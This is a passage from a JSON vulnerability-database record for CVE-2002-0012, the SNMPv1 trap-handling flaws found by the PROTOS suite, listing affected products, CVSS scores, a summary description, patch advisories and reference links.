            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows server sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows professional sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows professional sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows datacenter server sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows datacenter server sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows datacenter server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows advanced server sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows advanced server sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows advanced server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "domino snmp agents solaris",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "lotus",
            "version": "5.0.1x86"
          },
          {
            "_id": null,
            "model": "domino snmp agents solaris sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "lotus",
            "version": "5.0.1"
          },
          {
            "_id": null,
            "model": "domino snmp agents hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "lotus",
            "version": "5.0.1"
          },
          {
            "_id": null,
            "model": "lrs",
            "scope": null,
            "trust": 0.3,
            "vendor": "lantronix",
            "version": null
          },
          {
            "_id": null,
            "model": "junos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "solutions router ip console",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "innerdive",
            "version": "3.3.0.406"
          },
          {
            "_id": null,
            "model": "aix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.3.3"
          },
          {
            "_id": null,
            "model": "aix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.3.2"
          },
          {
            "_id": null,
            "model": "aix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.3.1"
          },
          {
            "_id": null,
            "model": "secure os software for linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "procurve switch 8000m",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "procurve switch 4108gl-bundle",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "procurve switch 4108gl",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "procurve switch 4000m",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "procurve switch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2525"
          },
          {
            "_id": null,
            "model": "procurve switch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2524"
          },
          {
            "_id": null,
            "model": "procurve switch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2512"
          },
          {
            "_id": null,
            "model": "procurve switch 2424m",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "procurve switch 2400m",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "procurve switch 1600m",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "ov/sam",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "3.0.1"
          },
          {
            "_id": null,
            "model": "openview network node manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.10"
          },
          {
            "_id": null,
            "model": "openview network node manager solaris",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "openview network node manager nt 4.x/windows",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.22000"
          },
          {
            "_id": null,
            "model": "openview network node manager hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.211.x"
          },
          {
            "_id": null,
            "model": "openview network node manager hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.210.x"
          },
          {
            "_id": null,
            "model": "openview network node manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "openview network node manager solaris",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "openview network node manager hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.111.x"
          },
          {
            "_id": null,
            "model": "openview network node manager hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.110.x"
          },
          {
            "_id": null,
            "model": "openview network node manager solaris",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "openview network node manager nt 4.x/windows",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.02000"
          },
          {
            "_id": null,
            "model": "openview network node manager hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.011.x"
          },
          {
            "_id": null,
            "model": "openview network node manager hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.010.20"
          },
          {
            "_id": null,
            "model": "openview network node manager windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.0.23.51/4.0"
          },
          {
            "_id": null,
            "model": "openview network node manager solaris",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.01"
          },
          {
            "_id": null,
            "model": "openview network node manager hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.01"
          },
          {
            "_id": null,
            "model": "openview network node manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.01"
          },
          {
            "_id": null,
            "model": "openview network node manager solaris",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "4.11"
          },
          {
            "_id": null,
            "model": "openview network node manager hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "4.11"
          },
          {
            "_id": null,
            "model": "openview extensible snmp agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "openview emanate snmp agent solaris",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "14.22.x"
          },
          {
            "_id": null,
            "model": "openview emanate snmp agent hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "14.211.x"
          },
          {
            "_id": null,
            "model": "openview emanate snmp agent hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "14.210.20"
          },
          {
            "_id": null,
            "model": "openview distributed management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "openview distributed management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.03"
          },
          {
            "_id": null,
            "model": "mc/serviceguard",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "jetdirect",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "x.20.00"
          },
          {
            "_id": null,
            "model": "jetdirect",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "x.08.32"
          },
          {
            "_id": null,
            "model": "jetdirect",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "x.08.00"
          },
          {
            "_id": null,
            "model": "ito/vpo/ovo unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "11.04"
          },
          {
            "_id": null,
            "model": "hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "10.24"
          },
          {
            "_id": null,
            "model": "hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "11.20"
          },
          {
            "_id": null,
            "model": "hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "11.11"
          },
          {
            "_id": null,
            "model": "hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "11.0"
          },
          {
            "_id": null,
            "model": "hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "10.20"
          },
          {
            "_id": null,
            "model": "hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "10.10"
          },
          {
            "_id": null,
            "model": "hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "ems a.03.20",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "ems a.03.10",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "ems a.03.00",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "services nmserver",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "comtek",
            "version": "3.4"
          },
          {
            "_id": null,
            "model": "associates unicenter",
            "scope": null,
            "trust": 0.3,
            "vendor": "computer",
            "version": null
          },
          {
            "_id": null,
            "model": "unixware",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "caldera",
            "version": "7.1.1"
          },
          {
            "_id": null,
            "model": "unixware",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "caldera",
            "version": "7.1.0"
          },
          {
            "_id": null,
            "model": "unixware",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "caldera",
            "version": "7"
          },
          {
            "_id": null,
            "model": "openunix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "caldera",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "openserver",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "caldera",
            "version": "5.0.6"
          },
          {
            "_id": null,
            "model": "openserver",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "caldera",
            "version": "5.0.5"
          },
          {
            "_id": null,
            "model": "cacheos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cacheflow",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "cacheos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cacheflow",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "web nms msp edition",
            "scope": null,
            "trust": 0.3,
            "vendor": "adventnet",
            "version": null
          },
          {
            "_id": null,
            "model": "web nms",
            "scope": null,
            "trust": 0.3,
            "vendor": "adventnet",
            "version": null
          },
          {
            "_id": null,
            "model": "snmp utilities",
            "scope": null,
            "trust": 0.3,
            "vendor": "adventnet",
            "version": null
          },
          {
            "_id": null,
            "model": "snmp api",
            "scope": null,
            "trust": 0.3,
            "vendor": "adventnet",
            "version": null
          },
          {
            "_id": null,
            "model": "mediation server",
            "scope": null,
            "trust": 0.3,
            "vendor": "adventnet",
            "version": null
          },
          {
            "_id": null,
            "model": "management builder",
            "scope": null,
            "trust": 0.3,
            "vendor": "adventnet",
            "version": null
          },
          {
            "_id": null,
            "model": "fault management toolkit",
            "scope": null,
            "trust": 0.3,
            "vendor": "adventnet",
            "version": null
          },
          {
            "_id": null,
            "model": "configuration management toolkit",
            "scope": null,
            "trust": 0.3,
            "vendor": "adventnet",
            "version": null
          },
          {
            "_id": null,
            "model": "cli api",
            "scope": null,
            "trust": 0.3,
            "vendor": "adventnet",
            "version": null
          },
          {
            "_id": null,
            "model": "agent toolkit java/jmx edition",
            "scope": null,
            "trust": 0.3,
            "vendor": "adventnet",
            "version": null
          },
          {
            "_id": null,
            "model": "agent toolkit c edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adventnet",
            "version": null
          },
          {
            "_id": null,
            "model": "webcache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "3com",
            "version": "3000"
          },
          {
            "_id": null,
            "model": "webcache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "3com",
            "version": "1000"
          },
          {
            "_id": null,
            "model": "switch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "3com",
            "version": "4900"
          },
          {
            "_id": null,
            "model": "switch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "3com",
            "version": "4400"
          },
          {
            "_id": null,
            "model": "switch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "3com",
            "version": "3300"
          },
          {
            "_id": null,
            "model": "switch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "3com",
            "version": "1100"
          },
          {
            "_id": null,
            "model": "ps hub",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "3com",
            "version": "50"
          },
          {
            "_id": null,
            "model": "ps hub",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "3com",
            "version": "40"
          },
          {
            "_id": null,
            "model": "dual speed hub",
            "scope": null,
            "trust": 0.3,
            "vendor": "3com",
            "version": null
          },
          {
            "_id": null,
            "model": "brocade .0d",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "sgi",
            "version": "2.6"
          },
          {
            "_id": null,
            "model": "solutions router ip console",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "innerdive",
            "version": "3.3.0.407"
          },
          {
            "_id": null,
            "model": "jetdirect",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hp",
            "version": "x.21.00"
          },
          {
            "_id": null,
            "model": "jetdirect",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hp",
            "version": "x.08.32"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#107186"
          },
          {
            "db": "CERT/CC",
            "id": "VU#854306"
          },
          {
            "db": "BID",
            "id": "89608"
          },
          {
            "db": "BID",
            "id": "89661"
          },
          {
            "db": "BID",
            "id": "5043"
          },
          {
            "db": "BID",
            "id": "4732"
          },
          {
            "db": "BID",
            "id": "4203"
          },
          {
            "db": "BID",
            "id": "4088"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200202-007"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2002-000033"
          },
          {
            "db": "NVD",
            "id": "CVE-2002-0012"
          }
        ]
      },
      "configurations": {
        "_id": null,
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:ibm:aix",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:sun:solaris",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:hp:hp-ux",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:hp:vvos",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:microsoft:windows_2000",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:microsoft:windows-9x",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:microsoft:windows_nt",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:microsoft:windows_xp",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:redhat:linux",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2002-000033"
          }
        ]
      },
      "credits": {
        "_id": null,
        "data": "Discovered by the Oulu University Secure Programming Group.",
        "sources": [
          {
            "db": "BID",
            "id": "5043"
          },
          {
            "db": "BID",
            "id": "4203"
          },
          {
            "db": "BID",
            "id": "4088"
          }
        ],
        "trust": 0.9
      },
      "cve": "CVE-2002-0012",
      "cvss": {
        "_id": null,
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2002-0012",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2002-0012",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#107186",
                "trust": 0.8,
                "value": "69.26"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#854306",
                "trust": 0.8,
                "value": "42.64"
              },
              {
                "author": "NVD",
                "id": "CVE-2002-0012",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-200202-007",
                "trust": 0.6,
                "value": "CRITICAL"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#107186"
          },
          {
            "db": "CERT/CC",
            "id": "VU#854306"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200202-007"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2002-000033"
          },
          {
            "db": "NVD",
            "id": "CVE-2002-0012"
          }
        ]
      },
      "description": {
        "_id": null,
        "data": "Vulnerabilities in a large number of SNMP implementations allow remote attackers to cause a denial of service or gain privileges via SNMPv1 trap handling, as demonstrated by the PROTOS c06-SNMPv1 test suite.  NOTE: It is highly likely that this candidate will be SPLIT into multiple candidates, one or more for each vendor.  This and other SNMP-related candidates will be updated when more accurate information is available. Multiple vendor SNMPv1 Trap handling implementations contain vulnerabilities that may allow unauthorized privileged access, denial-of-service conditions, or unstable behavior . If your site uses SNMP in any capacity, the CERT/CC encourages you to read the information provided below. ------------ This vulnerability information is a summary of multiple vulnerabilities released at the same time. Please note that the contents of vulnerability information other than the title are included. ------------ SNMP Protocol is status and performance information MIB (Management Information Base) Protocol used to exchange Management side SNMP Managers such as managed routers, switches and printers SNMP Communicates with management network devices called agents. Because of its wide acceptance in the market, SNMP Has become the standard for SNMP protocol version1 Is SNMPv1 Is the most widely implemented. this SNMPv1 Sent from the agent to the manager in the implementation of SNMP Trap message and sent from the manager to the agent SNMP Decrypt the request message / There are problems in interpreting. If this problem is used by an attacker, the following actions may be executed. Many other programs that you implement may also be affected because of a protocol problem. On the target host SNMP If the service is running, an attacker could execute arbitrary code \u30fb If a buffer overflow attack is feasible and a very long trap message SNMP If the host on which the service is running receives, the application may go into a denial of service state The effects described above vary from application to application. For details, refer to each product.Please refer to the \u201cOverview\u201d for the impact of this vulnerability. Windows 95 is prone to a denial-of-service vulnerability. MPE/iX is an Internet-ready operating system for the HP e3000 class servers.  It is possible to crash the service by transmitting to it a maliciously constructed SNMPv1 request PDU.  It was previously known as UCD-SNMP.  They typically notify the manager that some event has occured or otherwise provide information about the status of the agent. \nMultiple vulnerabilities have been discovered in a number of SNMP implementations.  The vulnerabilities are known to exist in the process of decoding and interpreting SNMP trap messages. \nAmong the possible consequences are denial of service and allowing attackers to compromise target systems.  These depend on the individual vulnerabilities in each affected product. \nHP has confirmed that large traps will cause OpenView Network Node Manager to crash.  This may be due to an exploitable buffer overflow condition",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2002-0012"
          },
          {
            "db": "CERT/CC",
            "id": "VU#107186"
          },
          {
            "db": "CERT/CC",
            "id": "VU#854306"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2002-000033"
          },
          {
            "db": "BID",
            "id": "89608"
          },
          {
            "db": "BID",
            "id": "89661"
          },
          {
            "db": "BID",
            "id": "5043"
          },
          {
            "db": "BID",
            "id": "4732"
          },
          {
            "db": "BID",
            "id": "4203"
          },
          {
            "db": "BID",
            "id": "4088"
          }
        ],
        "trust": 4.68
      },
      "external_ids": {
        "_id": null,
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2002-0012",
            "trust": 3.9
          },
          {
            "db": "CERT/CC",
            "id": "VU#107186",
            "trust": 3.2
          },
          {
            "db": "BID",
            "id": "4088",
            "trust": 2.2
          },
          {
            "db": "BID",
            "id": "4732",
            "trust": 1.9
          },
          {
            "db": "BID",
            "id": "4089",
            "trust": 1.9
          },
          {
            "db": "BID",
            "id": "4132",
            "trust": 1.6
          },
          {
            "db": "CERT/CC",
            "id": "VU#854306",
            "trust": 1.4
          },
          {
            "db": "BID",
            "id": "5043",
            "trust": 1.3
          },
          {
            "db": "XF",
            "id": "8177",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2002-000033",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200202-007",
            "trust": 0.6
          },
          {
            "db": "BID",
            "id": "89608",
            "trust": 0.3
          },
          {
            "db": "BID",
            "id": "89661",
            "trust": 0.3
          },
          {
            "db": "BID",
            "id": "4203",
            "trust": 0.3
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#107186"
          },
          {
            "db": "CERT/CC",
            "id": "VU#854306"
          },
          {
            "db": "BID",
            "id": "89608"
          },
          {
            "db": "BID",
            "id": "89661"
          },
          {
            "db": "BID",
            "id": "5043"
          },
          {
            "db": "BID",
            "id": "4732"
          },
          {
            "db": "BID",
            "id": "4203"
          },
          {
            "db": "BID",
            "id": "4088"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200202-007"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2002-000033"
          },
          {
            "db": "NVD",
            "id": "CVE-2002-0012"
          }
        ]
      },
      "id": "VAR-200202-0006",
      "iot": {
        "_id": null,
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.489583335
      },
      "last_update_date": "2026-04-10T23:59:45.929000Z",
      "patch": {
        "_id": null,
        "data": [
          {
            "title": "HPSBUX00184",
            "trust": 0.8,
            "url": "http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=c00964944"
          },
          {
            "title": "MS02-006",
            "trust": 0.8,
            "url": "http://www.microsoft.com/technet/security/bulletin/ms02-006.mspx"
          },
          {
            "title": "RHSA-2001:163",
            "trust": 0.8,
            "url": "http://rhn.redhat.com/errata/RHSA-2001-163.html"
          },
          {
            "title": "#00215",
            "trust": 0.8,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-22-00215-1"
          },
          {
            "title": "#00215",
            "trust": 0.8,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-22-00215-3"
          },
          {
            "title": "IBM Information for VU#107186",
            "trust": 0.8,
            "url": "http://www.kb.cert.org/vuls/id/IAFY-55KRCV"
          },
          {
            "title": "MS02-006",
            "trust": 0.8,
            "url": "http://www.microsoft.com/japan/technet/security/Bulletin/ms02-006.mspx"
          },
          {
            "title": "RHSA-2001:163",
            "trust": 0.8,
            "url": "http://www.jp.redhat.com/support/errata/RHSA/RHSA-2001-163J.html"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2002-000033"
          }
        ]
      },
      "problemtype_data": {
        "_id": null,
        "data": [
          {
            "problemtype": "CWE-264",
            "trust": 1.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2002-000033"
          },
          {
            "db": "NVD",
            "id": "CVE-2002-0012"
          }
        ]
      },
      "references": {
        "_id": null,
        "data": [
          {
            "trust": 3.0,
            "url": "http://www.cert.org/advisories/ca-2002-03.html"
          },
          {
            "trust": 2.4,
            "url": "http://www.kb.cert.org/vuls/id/107186"
          },
          {
            "trust": 1.6,
            "url": "http://www.ee.oulu.fi/research/ouspg/protos/"
          },
          {
            "trust": 1.6,
            "url": "http://www.cert.org/tech_tips/denial_of_service.html"
          },
          {
            "trust": 1.6,
            "url": "http://www.ietf.org/rfc/rfc3000.txt"
          },
          {
            "trust": 1.6,
            "url": "http://www.ietf.org/rfc/rfc1212.txt"
          },
          {
            "trust": 1.6,
            "url": "http://www.ietf.org/rfc/rfc1213.txt"
          },
          {
            "trust": 1.6,
            "url": "http://www.ietf.org/rfc/rfc1215.txt"
          },
          {
            "trust": 1.6,
            "url": "http://www.ietf.org/rfc/rfc1270.txt"
          },
          {
            "trust": 1.6,
            "url": "http://www.ietf.org/rfc/rfc2570.txt"
          },
          {
            "trust": 1.6,
            "url": "http://www.ietf.org/rfc/rfc2571.txt"
          },
          {
            "trust": 1.6,
            "url": "http://www.ietf.org/rfc/rfc2572.txt"
          },
          {
            "trust": 1.6,
            "url": "http://www.ietf.org/rfc/rfc2573.txt"
          },
          {
            "trust": 1.6,
            "url": "http://www.ietf.org/rfc/rfc2574.txt"
          },
          {
            "trust": 1.6,
            "url": "http://www.ietf.org/rfc/rfc2575.txt"
          },
          {
            "trust": 1.6,
            "url": "http://www.ietf.org/rfc/rfc2576.txt"
          },
          {
            "trust": 1.6,
            "url": "http://www.securityfocus.com/bid/4088"
          },
          {
            "trust": 1.6,
            "url": "http://online.securityfocus.com/bid/4132"
          },
          {
            "trust": 1.6,
            "url": "http://online.securityfocus.com/bid/4732"
          },
          {
            "trust": 1.6,
            "url": "http://www.securityfocus.com/bid/4089"
          },
          {
            "trust": 1.6,
            "url": "http://www.ee.oulu.fi/research/ouspg/protos/testing/c06/snmpv1/index.html"
          },
          {
            "trust": 1.4,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2002-0012"
          },
          {
            "trust": 1.0,
            "url": "http://www.securityfocus.com/advisories/4211"
          },
          {
            "trust": 1.0,
            "url": "http://www.redhat.com/support/errata/rhsa-2001-163.html"
          },
          {
            "trust": 1.0,
            "url": "ftp://patches.sgi.com/support/free/security/advisories/20020201-01-a"
          },
          {
            "trust": 1.0,
            "url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2002/ms02-006"
          },
          {
            "trust": 1.0,
            "url": "http://www.iss.net/security_center/alerts/advise110.php"
          },
          {
            "trust": 1.0,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1048"
          },
          {
            "trust": 1.0,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a161"
          },
          {
            "trust": 1.0,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a298"
          },
          {
            "trust": 1.0,
            "url": "http://www.securityfocus.com/bid/5043"
          },
          {
            "trust": 1.0,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a144"
          },
          {
            "trust": 0.8,
            "url": "http://www.ciac.org/ciac/bulletins/m-042.shtml"
          },
          {
            "trust": 0.8,
            "url": "http://www.ipa.go.jp/security/ciadr/20020213snmp.html"
          },
          {
            "trust": 0.8,
            "url": "http://www.jpcert.or.jp/wr/2002/wr020701.txt"
          },
          {
            "trust": 0.8,
            "url": "http://www.jpcert.or.jp/wr/2002/wr020901.txt"
          },
          {
            "trust": 0.8,
            "url": "http://www.jpcert.or.jp/at/2002/at020001.txt"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/cert/jvnca-2002-03"
          },
          {
            "trust": 0.8,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2002-0012"
          },
          {
            "trust": 0.8,
            "url": "http://xforce.iss.net/xforce/xfdb/8177"
          },
          {
            "trust": 0.6,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2002-0013"
          },
          {
            "trust": 0.6,
            "url": "http://www.microsoft.com/technet/security/bulletin/ms02-006.asp"
          },
          {
            "trust": 0.6,
            "url": "http://www.kb.cert.org/vuls/id/854306"
          },
          {
            "trust": 0.3,
            "url": "http://online.securityfocus.com/bid/4088"
          },
          {
            "trust": 0.3,
            "url": "http://online.securityfocus.com/bid/4089"
          },
          {
            "trust": 0.3,
            "url": "http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2f44605"
          },
          {
            "trust": 0.3,
            "url": "http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2f42769"
          },
          {
            "trust": 0.3,
            "url": "http://online.securityfocus.com/news/474"
          },
          {
            "trust": 0.3,
            "url": "http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms02-006.asp"
          },
          {
            "trust": 0.3,
            "url": "http://otn.oracle.com/deploy/security/pdf/snmp_2002_alert.pdf"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#107186"
          },
          {
            "db": "CERT/CC",
            "id": "VU#854306"
          },
          {
            "db": "BID",
            "id": "89608"
          },
          {
            "db": "BID",
            "id": "89661"
          },
          {
            "db": "BID",
            "id": "5043"
          },
          {
            "db": "BID",
            "id": "4732"
